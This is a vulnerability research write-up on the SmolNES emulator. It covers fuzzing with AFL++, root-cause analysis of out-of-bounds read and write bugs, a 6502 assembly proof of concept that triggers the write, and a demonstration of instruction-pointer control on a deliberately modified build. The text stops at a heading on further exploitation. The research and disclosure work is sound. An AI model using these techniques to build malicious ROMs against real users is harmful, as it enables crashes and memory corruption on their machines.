Vulnerability Research on SmolNES

Apr 3, 2026

Executive summary

The SmolNES emulator contains multiple memory safety vulnerabilities, including an Out-Of-Bounds Write via Mapper 3 (CHR-RAM) that leads to arbitrary memory corruption when loading a malicious ROM.

In practice, only availability is definitively impacted: a malicious ROM can trigger a reproducible crash. In SmolNES’s memory layout, the GOT and the heap are out of reach, and no exploitable function pointer exists within the range reachable by the overflow.

That said, it makes for an excellent case study, directly transferable to more critical targets with a favorable memory layout: section 9 demonstrates RIP control in a modified binary built to simulate that scenario.

1. Background and target selection
2. Setting up the fuzzing environment
3. First results: initial crashes
4. Lead 1: OOB Read in PRG-ROM (abandoned)
5. Source code analysis
6. Fuzzing iterations and optimizations
7. Discovering the real vulnerability
8. Memory mapping and exploitation attempt
9. PoC on modified binary: RIP control
10. Responsible Disclosure and CVE
11. Appendix: Required NES concepts
Resources

1. Background and target selection

Why SmolNES?

SmolNES GitHub page, 776 stars and 3 contributors

The source code is available on GitHub (binji/smolnes).

SmolNES is a NES (Nintendo Entertainment System) emulator written in roughly 700 lines of “golf” C in deobfuscated.c (intentionally compact code). A few characteristics make it an ideal target:

Trivially AFL-fuzzable interface: the program takes a single .nes ROM as its argument (./smolnes <rom.nes>). It’s enough to feed AFL++ with binary files, then pass the generated files directly into smolnes.
Small codebase: the developer explicitly prioritized compactness (the tagline is “NES emulator in <5000 bytes of C”), which almost certainly means bounds checking was skipped.
Hidden complexity: the NES is a complex machine (6502 CPU, PPU, Mapper system). It would be surprising if a project like this, with no security focus, had no bugs.
Few maintainers: the project has only 3 contributors, so it’s unlikely any vulnerability research has been done on it before.

The main attack surface identified right away is the iNES file header (the first 16 bytes of a ROM), which configures critical parameters such as memory bank sizes, mapper type, and graphics mode.

2. Setting up the fuzzing environment

Preparing the binary

The SmolNES source includes two versions:

smolnes.c: the official “golfed” version (unreadable)
deobfuscated.c: a readable version with explanatory comments; this is the one I used for research

Two modifications are made to deobfuscated.c before compiling for fuzzing:

Removing SDL calls (Simple DirectMedia Layer, the graphics/audio library): SDL initialization, window creation, rendering, and event polling are commented out. Without this, the program would try to open a window on every execution, making fuzzing too slow to be viable.
Capping the CPU cycle count: a limit is added to the main loop. Without this, a valid ROM would run the emulator forever.

Compiling with AFL++

The instrumented binary is compiled using the environment variables from the provided Makefile:

CC=afl-clang-lto make

afl-clang-lto (Link-Time Optimization) is AFL++’s highest-performance compiler mode: it inserts instrumentation at link time, yielding better coverage and throughput than the other modes such as afl-clang-fast or afl-gcc-fast.

Seed corpus

Free-to-use NES ROMs from the EmuDeck homebrew repository are used as the initial corpus. AFL++ will mutate them automatically to explore new execution paths.

Initial run

afl-fuzz -i games/ -o output_dir/ -- ./smolnes_instru/deobfuscated @@

AFL++ TUI iteration 1: exec speed ~1500/sec, stability 100%, first crashes

The metrics are promising:

~1500 execs/sec: removing SDL was a success
stability 100%: the emulator is deterministic, which is essential for effective fuzzing

3. First results: initial crashes

AFL++ finds its first crashes quickly. Within minutes, 3 unique crash files are saved in output_dir/default/crashes/. After this initial burst, no new unique crashes appear despite tens of additional minutes of fuzzing.

sig:11 (SIGSEGV) is present on all crashes, indicating an invalid memory access.

4. Lead 1: OOB Read in PRG-ROM (abandoned)

The first crash is loaded into GDB for analysis.

GDB crash OOB Read: fatal instruction movzx, $rax=0x3ffffc

→ movzx  r15d, BYTE PTR [rax+rcx*1+0x10]
; deobfuscated.c:234 : return rom[(prg[hi - 8 >> prgbits - 12] & ...) << prgbits | ...]
; mem(lo=0xfc, hi=0xf, val=0x0, write=0x0), reason: SIGSEGV

This corresponds to the following code:

// deobfuscated.c
return rom[(prg[hi - 8 >> prgbits - 12] & (rombuf[4] << 14 - prgbits) - 1)
               << prgbits |
           addr & (1 << prgbits) - 1];

The emulator attempts to read at index 4,194,300 in rom[], a buffer with a maximum size of 1 MB: this is an Out-Of-Bounds Read.

Root cause: rombuf[4] (5th byte of the iNES header, number of PRG banks) was set to 0x00 by AFL. The emulator then initializes:

prg[1] = rombuf[4] - 1;
// If rombuf[4] == 0 : 0 - 1 = 255 (unsigned underflow)

The PRG-ROM read computation becomes prg[1] * 0x4000 + offset = 255 * 0x4000 + 0x3FFC = 0x3FFFFC, which is exactly the $rax value observed.
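The arithmetic can be checked in isolation. The sketch below is not SmolNES code: prg_rom_index is a hypothetical helper that mirrors the index expression for the upper 16 KB window only, under the assumption that prgbits is 14 (16 KB banks), as the computation above implies.

```c
#include <assert.h>
#include <stdint.h>

/* Hypothetical helper (not part of SmolNES): reproduces the PRG index
 * computation for a CPU address in $C000-$FFFF, assuming prgbits == 14. */
static uint32_t prg_rom_index(uint8_t prg_bank_count, uint16_t addr) {
  assert(addr >= 0xC000);                             /* upper window only */
  uint8_t last_bank = (uint8_t)(prg_bank_count - 1);  /* 0 wraps to 255 */
  uint32_t mask = (uint32_t)prg_bank_count - 1;       /* 0 wraps to all ones */
  uint32_t bank = last_bank & mask;
  return bank << 14 | (addr & 0x3FFF);
}
```

With a bank count of 0, the Reset Vector address $FFFC resolves to index 0x3FFFFC; with a bank count of 1 it resolves to 0x3FFC, inside the first bank.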

Why this lead is abandoned: this crash happens at the very start of execution, during the Reset Vector read (the game’s first instruction). It causes an immediate crash (DoS), but there is no control over the value read or the target address. Additionally, this bug blocks AFL: nearly every mutation generates this same immediate crash, the emulator never actually starts, and AFL cannot explore the deeper execution paths that are of interest.

5. Source code analysis

Before optimizing the fuzzer, it’s necessary to understand the code in order to target the right execution paths. This is a good moment to read the appendix covering the NES architectural concepts, as things get fairly dense from here.

Overview of deobfuscated.c

The code is built around a single large main function that contains the emulator’s main loop, plus a few helper functions.

Initialization: header parsing

// deobfuscated.c
SDL_RWread(SDL_RWFromFile(argv[1], "rb"), rombuf, 1024 * 1024, 1);
// The full ROM file is loaded into rombuf[1024*1024]

rom = rombuf + 16;        // Game code starts after the 16-byte header
prg[1] = rombuf[4] - 1;  // Index of the last PRG bank (header byte 4)

// Header byte 5: number of CHR-ROM banks in the file
// If 0: the game has no CHR-ROM, it uses CHR-RAM (8 KB of RAM)

//                                             v--- CHR-RAM mode: chrrom = chrram[8192]
chrrom = rombuf[5] ? rom + (rombuf[4] << 14) : chrram;
//                   ^--- CHR-ROM mode: chrrom points into the file

chrrom is the base pointer for graphics data access. Its value (either pointing into the ROM file or into chrram) is the pivot of the vulnerability.

The `get_chr_byte()` function

// deobfuscated.c
uint8_t *get_chr_byte(uint16_t a) {
  return &chrrom[chr[a >> chrbits] << chrbits | a % (1 << chrbits)];
}

The parameter a is a 14-bit VRAM address (value between 0 and 16383), representing a position in the PPU’s graphics address space. The variable V plays this role during an access from $2007.

The formula is compact. To read it, note that a >> chrbits (with chrbits = 12) drops the 12 offset bits and keeps the bits above them, which select the bank slot. In standard CHR-RAM mode, a is bounded to $0000-$1FFF (8192 values, i.e. 13 bits) before the call, so a >> 12 can only be 0 or 1, selecting one of the two 4 KB bank slots. The value stored in that slot, chr[a >> 12], is what can exceed 1 (the heart of the vulnerability). The << chrbits shift reconstructs the bank base address, and the modulo recovers the intra-bank offset:

// Equivalent readable version (with chrbits = 12, bank size = 4096 bytes):
uint8_t *get_chr_byte_readable(uint16_t a) {
  uint8_t  bank_index = chr[a >> 12];          // bits 12-15 of 'a' -> bank number
  uint32_t bank_base  = bank_index << 12;      // bank_index * 4096
  uint16_t offset     = a & 0xFFF;            // bits 0-11 of 'a' -> offset within bank
  return &chrrom[bank_base + offset];
}

chr[] is an array of graphics bank indices, updated by the Mappers. In CHR-RAM mode, chrrom == chrram and chrram is only 8192 bytes (2 banks of 4096). If bank_index >= 2, then bank_base >= 8192, and the returned pointer goes past the end of chrram.
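To make the missing check concrete, here is a minimal sketch of what a bounds-checked variant could look like in CHR-RAM mode. It is not taken from SmolNES: chr_ram_offset_checked, CHR_RAM_SIZE and CHR_BANK_BITS are names introduced for this illustration, and the function returns an offset rather than a pointer so it can be tested on its own.

```c
#include <assert.h>
#include <stdint.h>

enum { CHR_RAM_SIZE = 8192, CHR_BANK_BITS = 12 };

/* Hypothetical check (not in SmolNES): returns the byte offset that
 * get_chr_byte() would compute, or -1 if it falls outside an 8 KB CHR-RAM. */
static long chr_ram_offset_checked(const uint8_t chr[2], uint16_t a) {
  assert(a < 8192); /* pattern-table addresses only */
  uint32_t offset = (uint32_t)chr[a >> CHR_BANK_BITS] << CHR_BANK_BITS
                  | (a & ((1u << CHR_BANK_BITS) - 1));
  return offset < CHR_RAM_SIZE ? (long)offset : -1;
}
```

With chr = {0, 1} every address in $0000-$1FFF stays inside the array; with chr = {2, 3} the very first address is already rejected.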

The central `mem()` function

mem() emulates all 6502 CPU memory accesses. It takes the address (hi:lo), the value to write (val), and the operation direction (write).

// deobfuscated.c (excerpt)
uint8_t mem(uint8_t lo, uint8_t hi, uint8_t val, uint8_t write) {
  uint16_t addr = hi << 8 | lo;

  switch (hi >>= 4) {  // Divide hi by 16 to get the memory "region"

  case 0: case 1: // Region $0000-$1FFF: internal RAM (2 KB, mirrored over 8 KB)
    // The NES physically has only 2 KB of RAM ($0000-$07FF). The remaining 6 KB
    // ($0800-$1FFF) are mirrors: accessing $0800 or $0000 reads the same physical byte.
    return write ? ram[addr] = val : ram[addr];

  case 2: case 3: // Region $2000-$3FFF: PPU registers (mirrored)
    // The 8 PPU registers ($2000-$2007) are mirrored across the entire $2000-$3FFF range.
    // lo &= 7 keeps only the 3 low bits, mapping any address in this range to its
    // corresponding PPU register.
    // Ex: $2015 -> 0x15 & 7 = 5 -> register $2005 (ppuscroll).
    lo &= 7;

    if (lo == 7) { // Register $2007 = PPUDATA (PPU data port)
      // The PPU has a one-cycle read delay: reading $2007 does not immediately return
      // the value at address V, but the value from the previous cycle, stored in ppubuf.
      // The current read is buffered for the next access.
      // Exception: the palette ($3F00+) is returned without buffering.
      // That's why tmp = ppubuf at the start and return tmp at the end.
      tmp = ppubuf;
      uint8_t *rom =
          // If V points into the Pattern Table area (0x0000-0x1FFF):
          V < 8192  ? write && chrrom != chrram
                          ? &tmp              // Write to CHR-ROM: ignore
                                              // (tmp serves as a bit bucket; CHR-ROM
                                              // is read-only on real hardware)
                          : get_chr_byte(V)   // Write to CHR-RAM or any read
          // If V points into the Nametable area (0x2000-0x3EFF):
          : V < 16128 ? get_nametable_byte(V)
          // Otherwise: Palette area (0x3F00+)
                      : palette_ram + (uint8_t)((V & 19) == 16 ? V ^ 16 : V);
      write ? *rom = val : (ppubuf = *rom); // Actual write or read
      V += ppuctrl & 4 ? 32 : 1;  // V auto-increments after each $2007 access
      V %= 16384;  // V stays within the PPU address space (14 bits = 2^14 = 16384)
      return tmp;
    }
    // ... handling of other PPU registers ($2000 ppuctrl, $2006 ppuaddr, etc.)

  case 4: // Region $4000-$4FFF: APU and I/O registers
    // $4016: joypad read (keyboard state in the emulator)
    for (tmp = 0, hi = 8; hi--;)
      tmp = tmp * 2 + key_state[...]; // key_state = pointer to keyboard state

  case 6: case 7: // Region $6000-$7FFF: PRG-RAM (optional cartridge RAM)
    // Two distinct memories, two distinct roles:
    // - Internal RAM ($0000-$1FFF): 2 KB soldered on the motherboard. Game variables,
    //   6502 stack. Present on every NES.
    // - PRG-RAM ($6000-$7FFF): optional 8 KB ON the cartridge. Absent from most games.
    //   When present, often battery-backed to save progress (e.g. The Legend of Zelda).
    addr &= 8191; // Keep the 13 low bits (0x1FFF) to address prgram[8192]
    return write ? prgram[addr] = val : prgram[addr];

  default: // Region $8000-$FFFF: ROM + Mapper handling
    // IMPORTANT: writes to the ROM region do not modify the ROM.
    // They are intercepted and interpreted as commands to the Mapper.
    if (write)
      switch (rombuf[6] >> 4) { // Mapper number
      case 7: // Mapper 7 (AxROM)
        // ...
      case 4: // Mapper 4 (MMC3)
        // ...
      case 3: // Mapper 3 (CNROM): CHR bank switching only
        chr[0] = val % 4 * 2; // Even bank (0, 2, 4, or 6)
        chr[1] = chr[0] + 1;  // Next odd bank (1, 3, 5, or 7)
        break;
      case 2: // Mapper 2 (UNROM)
        // ...
      case 1: // Mapper 1 (MMC1)
        // ...
      }
    return rom[(prg[hi - 8 >> prgbits - 12] & (rombuf[4] << 14 - prgbits) - 1)
                   << prgbits |
               addr & (1 << prgbits) - 1];
  }
  return ~0;
}

Key points identified for the vulnerability:

Register $2007 (PPUDATA): this is the PPU’s data port. Writing to $2007 from 6502 code triggers a VRAM write whose destination, for V below $2000, is computed by get_chr_byte(V). V is the PPU’s internal address cursor, controlled by writes to $2006 (PPUADDR).
Mapper 3: any write anywhere in $8000-$FFFF modifies chr[0] without bounds checking. With val=0x01 (or any val such that val % 4 == 1), chr[0] = 0x01 % 4 * 2 = 2.
The partial safety check: write && chrrom != chrram ? &tmp : get_chr_byte(V). If chrrom == chrram (CHR-RAM mode), the write goes through get_chr_byte with no bounds check on the bank index. This is the only case where a pattern-table write can go out of bounds.

6. Fuzzing iterations and optimizations

Iteration 1: SDL removal + cycle cap (result: 3 crashes, then stall)

The first harness version simply removes SDL graphics calls and adds a cycle limit. AFL++ quickly finds 3 unique crashes (all related to the OOB Read in PRG-ROM described in section 4), then stalls.

Reason for the stall: the emulator crashes too early. When rombuf[4]=0, the NES CPU never really starts: it reads the Reset Vector through an invalid bank index, roughly 4 MB into a 1 MB buffer, and crashes immediately. AFL cannot explore the deeper execution paths (like the 6502 code that writes to $2007).

Iteration 2: header patches + ASAN + 6502 dictionary

Knowing the code better, several additional modifications are made.

Header patches in the harness (applied after reading the file):

// Prevent PRG underflow and the immediate $FFFC crash
if (rombuf[4] == 0 || rombuf[4] > 64) rombuf[4] = 1;
// Force CHR-RAM mode: chrrom = chrram, which activates the path through get_chr_byte()
rombuf[5] = 0;
// Force Mapper 3 (CNROM), preserve the mirroring bit
rombuf[6] = (rombuf[6] & 0x01) | 0x30;

These three patches steer AFL toward the vulnerable path:

rombuf[4] clamped: prevents the immediate PRG crash
rombuf[5] = 0: ensures chrrom == chrram, a necessary condition for the OOB Write
rombuf[6] = 0x3X: forces Mapper 3, enabling CHR bank switching without bounds checking

Note on rombuf[4] > 64: the value is capped at 64 banks maximum. This limit exactly matches the rombuf buffer size (1 MB / 16 KB per bank = 64 banks). Beyond that, index calculations would exceed the allocated megabyte. This is not an official NES limit (real NES ROMs have at most 32 PRG banks) but a safety bound derived from the buffer size.

Compiling with ASAN:

AFL_USE_ASAN=1 CC=afl-clang-lto make

Without ASAN, an OOB Write silently corrupts adjacent memory without an immediate crash as long as the overwritten region is mapped and writable. ASAN detects the out-of-bounds access at the very first overflowed byte, making the crash systematic.

The trade-off is a performance drop: ~300 execs/sec instead of ~1500. Further optimizations could improve this, but it wasn’t necessary given that enough crashes were found at this reduced speed.

AFL++ dictionary (nes6502.dict):

# iNES header
magic="NES\x1a"
mapper3="\x30"

# 6502 write opcodes
op_sta_abs="\x8D"
op_stx_abs="\x8E"

# NES register addresses
ppu_addr="\x06\x20"   # $2006: PPUADDR
ppu_data="\x07\x20"   # $2007: PPUDATA
mapper_reg="\x00\x80" # $8000: Mapper 3 register

#...
# The actual dictionary I used was considerably larger

Without the dictionary, AFL has to stumble upon the sequence 8D 07 20 (STA $2007) by chance among 16,777,216 possible 3-byte combinations. With the dictionary, it inserts it directly.

Surface bug hotfixes:

Two additional bugs were identified and hotfixed in the harness to let ASAN reach the target bug:

OOB Write in palette_ram: the index (uint8_t)(...) can be up to 255, but palette_ram is only 64 bytes. Hotfix: & 63 to clamp the index.
OOB Read in PRG-ROM: the computed index in the PRG formula can exceed 1 MB. Hotfix: add a bounds check before the return.

Both bugs are real (confirmed on legitimate, unmodified ROMs), but of lesser interest: the first is a write with a limited range (~191 bytes maximum), the second is a read with no control over the value returned.
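The palette case is easy to reproduce outside the emulator. The sketch below copies the index expression from mem() into a standalone function and adds the & 63 clamp described above; palette_index and palette_index_clamped are names made up for this illustration, not SmolNES functions.

```c
#include <assert.h>
#include <stdint.h>

/* Index expression copied from the $2007 handler, for V in $3F00-$3FFF. */
static uint8_t palette_index(uint16_t v) {
  assert(v >= 0x3F00 && v < 0x4000);
  return (uint8_t)((v & 19) == 16 ? v ^ 16 : v);
}

/* Harness hotfix as described in the text: keep the index inside the
 * 64-byte palette_ram array. */
static uint8_t palette_index_clamped(uint16_t v) {
  return palette_index(v) & 63;
}
```

For V = $3F40 the unclamped index is 64, the first byte past the array, and for V = $3FFF it is 255; the clamped version never exceeds 63.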

Result: AFL++ finds the CHR-RAM OOB Write crash very quickly.

AFL++ TUI iteration 2: CHR-RAM OOB Write crash found with ASAN + dictionary + header patches

7. Discovering the real vulnerability: OOB Write via Mapper 3 CHR-RAM

The ASAN crash

With the patched binary (ASAN + forced Mapper 3 + forced CHR-RAM), AFL++ produces a new type of crash. Replayed under GDB with ASAN, it reveals:

ASAN: global-buffer-overflow WRITE 0 bytes after chrram

==ERROR: AddressSanitizer: global-buffer-overflow
WRITE of size 1 at 0x55555628c9a0 thread T0
    #0 in mem deobfuscated.c:92
0x55555628c9a0 is located 0 bytes after global variable 'chrram' (size 8192)

Unlike the previous crashes (READ), this one is a WRITE. It lands exactly at chrram[8192], the first byte past the end of the array.

The stack trace (#0) points to line 92 of mem():

write ? *rom = val : (ppubuf = *rom);  // line 92

Here, rom is the pointer returned by get_chr_byte(V), whose value has gone past the bounds of chrram. ASAN interrupts execution at the exact moment of the write.

Root cause: `get_chr_byte()` without bounds checking

In CHR-RAM mode (chrrom == chrram, from rombuf[5] = 0) with Mapper 3 active (rombuf[6] >> 4 == 3), any CPU write to $8000-$FFFF modifies the CHR banks:

case 3: // mapper 3
    chr[0] = val % 4 * 2;
    chr[1] = chr[0] + 1;
    break;

val is entirely controlled by the ROM. The possible values of chr[0] and their consequences:

val written   chr[0]   base offset into chrram   out-of-bounds?   OOB range
val%4 = 0     0        0                         no               -
val%4 = 1     2        8192                      yes              +4095 B
val%4 = 2     4        16384                     yes              +12287 B
val%4 = 3     6        24576                     yes              +20479 B

There is no check that chr[0] stays within the physical bounds of chrram.

Trigger conditions

Three conditions, all satisfiable by a malicious ROM:

rombuf[5] == 0 (iNES header byte 5, controlled by the ROM): enables CHR-RAM mode
rombuf[6] >> 4 == 3 (high nibble of header byte 6, controlled by the ROM): enables Mapper 3
A CPU write to $2007 (PPUDATA) with V in $0000-$1FFF, after a Mapper write that set chr[0] >= 2

Write address control

The target address is fully derivable from two controllable parameters:

address = &chrram[ chr[V >> 12] * 4096 + (V & 0xFFF) ]

val written to $8000+: determines chr[0] (0, 2, 4, or 6)
V: positioned by two consecutive writes to $2006

Granularity is one byte. The written value (from the 6502’s A, X, or Y register) is also controlled by the ROM.
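The mapping between a target offset and the two parameters can be sketched in both directions. This is an illustration under the formula above, not code from SmolNES or from the PoC script: chr_write_plan, chr_write_offset and plan_chr_write are hypothetical names. The inverse also uses the chr[1] slot (V in $1000-$1FFF), which get_chr_byte selects when bit 12 of V is set.

```c
#include <assert.h>
#include <stdint.h>

typedef struct {
  uint8_t  mapper_val; /* value to store somewhere in $8000-$FFFF */
  uint16_t v;          /* PPU address to load through $2006 */
} chr_write_plan;

/* Forward direction: offset from the start of chrram hit by a $2007 write. */
static uint32_t chr_write_offset(uint8_t mapper_val, uint16_t v) {
  assert(v < 0x2000);
  uint8_t chr0 = (uint8_t)(mapper_val % 4 * 2);          /* Mapper 3 rule */
  uint8_t bank = (v >> 12) ? (uint8_t)(chr0 + 1) : chr0; /* chr[1] = chr[0] + 1 */
  return (uint32_t)bank << 12 | (v & 0x0FFF);
}

/* Inverse: pick mapper_val and V for a wanted offset; -1 if unreachable. */
static int plan_chr_write(uint32_t offset, chr_write_plan *plan) {
  uint32_t bank = offset >> 12;            /* 4 KB bank number */
  if (bank > 7) return -1;                 /* Mapper 3 yields banks 0..7 only */
  plan->mapper_val = (uint8_t)(bank / 2);  /* even bank comes from chr[0] */
  plan->v = (uint16_t)((bank & 1) << 12 | (offset & 0x0FFF));
  return 0;
}
```

For example, offset 8192 (the first byte after chrram) maps to mapper_val = 1 and V = $0000, which is the case used in the demonstration that follows.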

Demonstration: minimal 6502 assembly

The following sequence triggers an OOB Write at the first byte after chrram. iNES header: 1 PRG bank (rombuf[4] = 1), 0 CHR banks (rombuf[5] = 0), Mapper 3 (rombuf[6] = 0x30).

; Entry point (Reset Vector at $FFFC points here)

; Step 1: select the CHR bank via Mapper 3
; val=1 => chr[0] = 1%4*2 = 2 => base offset = 2*4096 = 8192 (first OOB byte)
LDA #$01         ; $A9 $01
STA $8000        ; $8D $00 $80 -> Mapper 3: chr[0]=2, chr[1]=3

; Step 2: set V via two consecutive writes to $2006
LDA #$00         ; $A9 $00
STA $2006        ; $8D $06 $20  (high byte: $00)
LDA #$00         ; $A9 $00
STA $2006        ; $8D $06 $20  (low byte: $00) => V = $0000

; Step 3: write via $2007 (PPUDATA)
; get_chr_byte($0000) = &chrram[2*4096 + 0] = &chrram[8192] -> OOB
LDA #$41         ; $A9 $41  (value to write)
STA $2007        ; $8D $07 $20 -> WRITE to chrram[8192]

To target a different offset:

Target (offset from start of chrram)   val at $8000      V via $2006
8192 + N (N < 4096)                    $01 (chr[0]=2)    $0000-$0FFF
16384 + N (N < 4096)                   $02 (chr[0]=4)    $0000-$0FFF
24576 + N (N < 4096)                   $03 (chr[0]=6)    $0000-$0FFF
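For readers who want to reproduce the minimal case, the assembly above can be packed into an iNES image with a few lines of C. This is a sketch, not the script used for this research: build_poc_rom and the constants are hypothetical names, and the trailing JMP is an addition of this sketch so that the CPU spins instead of running into zero padding. With a single PRG bank, the same 16 KB is visible at $8000 and $C000, so the code sits at $8000 and the Reset Vector at PRG offset 0x3FFC.

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

enum { INES_HEADER_SIZE = 16, PRG_BANK_SIZE = 16384 };

/* The sequence from the listing above, plus a final JMP to itself
 * (an addition for this sketch). */
static const uint8_t poc_code[] = {
  0xA9, 0x01, 0x8D, 0x00, 0x80, /* LDA #$01 ; STA $8000 -> chr[0] = 2   */
  0xA9, 0x00, 0x8D, 0x06, 0x20, /* LDA #$00 ; STA $2006 (high byte)     */
  0xA9, 0x00, 0x8D, 0x06, 0x20, /* LDA #$00 ; STA $2006 (low byte)      */
  0xA9, 0x41, 0x8D, 0x07, 0x20, /* LDA #$41 ; STA $2007 -> chrram[8192] */
  0x4C, 0x14, 0x80,             /* JMP $8014 (spin forever)             */
};

/* Writes header + one PRG bank into out; returns the image size, 0 if
 * the buffer is too small. */
static size_t build_poc_rom(uint8_t *out, size_t cap) {
  const size_t total = INES_HEADER_SIZE + PRG_BANK_SIZE;
  assert(out != NULL);
  if (cap < total) return 0;
  memset(out, 0, total);
  memcpy(out, "NES\x1a", 4); /* magic */
  out[4] = 1;                /* 1 PRG bank */
  out[5] = 0;                /* 0 CHR banks -> CHR-RAM mode */
  out[6] = 0x30;             /* Mapper 3 */
  uint8_t *prg = out + INES_HEADER_SIZE;
  memcpy(prg, poc_code, sizeof poc_code);
  prg[0x3FFC] = 0x00;        /* Reset Vector low byte  */
  prg[0x3FFD] = 0x80;        /* Reset Vector high byte -> $8000 */
  return total;
}
```

Writing the returned buffer to a .nes file and loading it in an ASAN build should reproduce the report shown in section 7, assuming the harness leaves the header bytes untouched.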

8. Memory mapping and exploitation attempt

.bss section layout

GDB: addresses of global variables in the .bss section

The order of global variables in memory (.bss section, confirmed via GDB on the release binary):

0x55555567a220  chrram      [8192 bytes]  <- start of the overflow region
0x55555567c220  ram         [8192 bytes]
0x55555567e220  palette_ram [64 bytes]
0x55555567e260  vram        [2048 bytes]
0x55555567ea60  ptb_lo      [1 byte]
0x55555567ea70  addr_lo     [1 byte]
0x55555567ea80  prg         [4 bytes]
0x55555567ea90  rom         [8 bytes]  (pointer)
...

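Maximum overflow range with Mapper 3: with chr[0] at its maximum of 6 (V in $0000-$0FFF), the write reaches offset 6 * 4096 + 4095 = 28671 from the start of chrram, i.e. up to 20479 bytes (~20 KB) past its end. Since chr[1] = chr[0] + 1 = 7 is selected when V is in $1000-$1FFF, the reachable window extends by one more 4 KB bank, up to offset 32767.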

The GOT is out of reach

The natural first target for an OOB Write is the GOT (Global Offset Table), which holds the addresses of libc functions. Overwriting a GOT entry redirects a function call to arbitrary code.

GDB: GOT located before the .bss section, out of reach

gef➤  p/d 0x555555559fc0 - 0x55555567a220 # GOT - chrram
$5 = -1180256   # Negative value (~-1.1 MB)

The GOT is located approximately 1.1 MB before chrram in memory. Since the OOB Write can only reach addresses at positive offsets from chrram, the GOT is inaccessible.

The heap is out of reach

The heap (dynamically allocated by SDL at startup) is another potential target: it may contain function pointers or exploitable allocator metadata.

Distance chrram -> heap start: 0x23e749f0 ~ 574 MB

As expected, ASLR places the heap several hundred megabytes away from the .bss section. The maximum OOB range (~20 KB with Mapper 3) is nowhere near that distance.

Analysis of variables within range

In the ~20 KB reachable after chrram, the variables present are integer arrays (ram, palette_ram, vram) and scalars (ptb_lo, addr_lo, 6502 registers, prg). Overwriting them disrupts emulation but provides no useful primitive: no function pointer is present in this region.

One variable stands out, though: the pointer rom, located ~18 KB after the start of chrram (offset 0x4870 in the layout above). It points to the start of the PRG data inside rombuf and is used for offset calculations. Overwriting it would change the base for address arithmetic, potentially enabling access to arbitrary memory, but it would also alter where instructions are read from. This primitive self-destructs upon use.
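The reachability reasoning of this section boils down to one comparison, sketched below with the addresses observed in GDB. in_overflow_window is a hypothetical helper written for this article's numbers; MAX_OFFSET uses the 28671-byte figure derived above for chr[0] = 6.

```c
#include <assert.h>
#include <stdint.h>

enum { CHRRAM_SIZE = 8192, MAX_OFFSET = 6 * 4096 + 4095 };

/* Returns 1 if target_addr lies past the end of chrram but within the
 * furthest offset the Mapper 3 write can reach, 0 otherwise. */
static int in_overflow_window(uint64_t chrram_addr, uint64_t target_addr) {
  assert(chrram_addr <= UINT64_MAX - MAX_OFFSET);
  if (target_addr < chrram_addr + CHRRAM_SIZE)
    return 0; /* below chrram (negative offset) or still inside it */
  return target_addr - chrram_addr <= MAX_OFFSET;
}
```

With chrram at 0x55555567a220, the GOT (0x555555559fc0) and the heap (chrram + 0x23e749f0) both fall outside the window, while rom (0x55555567ea90) falls inside it.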

Impact assessment

Guaranteed DoS: reproducible crash with a malicious .nes ROM, confirmed via ASAN
Memory corruption: up to ~20 KB of global variables can be overwritten, disrupting emulation arbitrarily
Direct RCE: not achievable with this memory layout (GOT and heap out of reach, no function pointer in the reachable region)

9. PoC on modified binary: RIP control

SmolNES’s memory layout contains no function pointer within the overflow’s reach. To illustrate the vulnerability’s potential in a favorable scenario, a function pointer is manually added to deobfuscated.c’s source, in the .bss section immediately after chrram. This pointer does not exist in the original binary. A malicious ROM overwrites it with 0xdeadbeef, giving control of RIP (the instruction pointer register on x86_64) on the next call.

Code modification

The modification touches the Makefile and three source files (deobfuscated.c plus the new poc_hook.h and poc_hook.c). The function pointer is declared in a separate compilation unit (poc_hook.c) so that the linker places its .bss after that of deobfuscated.o, and therefore at a higher address than chrram.

poc_hook.h:

typedef void (*render_hook_t)(void);
extern render_hook_t render_hook;

poc_hook.c:

typedef void (*render_hook_t)(void);
render_hook_t render_hook;

Full diff:

diff --git a/Makefile b/Makefile
--- a/Makefile
+++ b/Makefile
@@ -18,8 +18,8 @@
-deobfuscated: deobfuscated.c
-       $(CC) -O2 -o $@ $< ${SDLFLAGS} -g ${WARN}
+deobfuscated: deobfuscated.c poc_hook.c
+       $(CC) -O2 -o $@ deobfuscated.c poc_hook.c ${SDLFLAGS} -g ${WARN}

diff --git a/deobfuscated.c b/deobfuscated.c
--- a/deobfuscated.c
+++ b/deobfuscated.c
@@ -1,5 +1,6 @@
 #include <SDL2/SDL.h>
 #include <stdint.h>
+#include "poc_hook.h"

@@ -691,6 +691,8 @@
         SDL_RenderPresent(renderer);
+        // [POC] Call render hook if defined
+        if (render_hook) render_hook();
         // Handle SDL events.

Two points to note:

Makefile: poc_hook.c is added as an explicit source, after deobfuscated.c. With the default link order, the linker places poc_hook.o’s .bss after deobfuscated.o’s, so render_hook ends up at an address higher than all variables in deobfuscated.c, including chrram.
Call site: the hook is called after each SDL_RenderPresent, i.e. once per frame (scanline 241). That’s the natural moment for an emulator to expose this kind of callback.

This pattern is realistic: many emulators expose such callbacks for debugging tools, save states, or GUI frontends.

Malicious ROM

The ROM is generated by the make_poc_rom.py script (see Resources). It takes the offset of render_hook from chrram in the target binary’s .bss, then writes the pointer value 0xdeadbeef as 8 little-endian bytes via successive writes to $2007, with V incrementing by 1 after each one (the PPUDATA auto-increment, with bit 2 of ppuctrl clear).
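The byte-by-byte write can be sketched as follows. This is not the make_poc_rom.py script, only an illustration of the same idea in C: emit_pointer_write is a hypothetical helper that emits one LDA/STA $2007 pair per byte of a 64-bit pointer, low byte first, and assumes the Mapper write and the two $2006 writes have already positioned the destination.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Emits "LDA #byte ; STA $2007" for each of the 8 little-endian bytes of
 * value. Returns the number of code bytes written, 0 if out is too small. */
static size_t emit_pointer_write(uint64_t value, uint8_t *out, size_t cap) {
  size_t n = 0;
  assert(out != NULL);
  for (int i = 0; i < 8; i++) {
    if (n + 5 > cap) return 0;
    out[n++] = 0xA9;                        /* LDA #imm */
    out[n++] = (uint8_t)(value >> (8 * i)); /* byte i, least significant first */
    out[n++] = 0x8D;                        /* STA abs */
    out[n++] = 0x07;                        /* low byte of $2007 */
    out[n++] = 0x20;                        /* high byte of $2007 */
  }
  return n;
}
```

For 0xdeadbeef the immediates are EF, BE, AD, DE followed by four zero bytes, for 40 bytes of 6502 code in total.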

Result

RIP is controlled. The emulator jumped to the address supplied by the malicious ROM.

Toward a full exploit

Controlling RIP is not enough to execute arbitrary code on a modern system: ASLR and the NX bit are highly effective mitigations.

Two classic approaches to go further:

Option 1: One-gadget

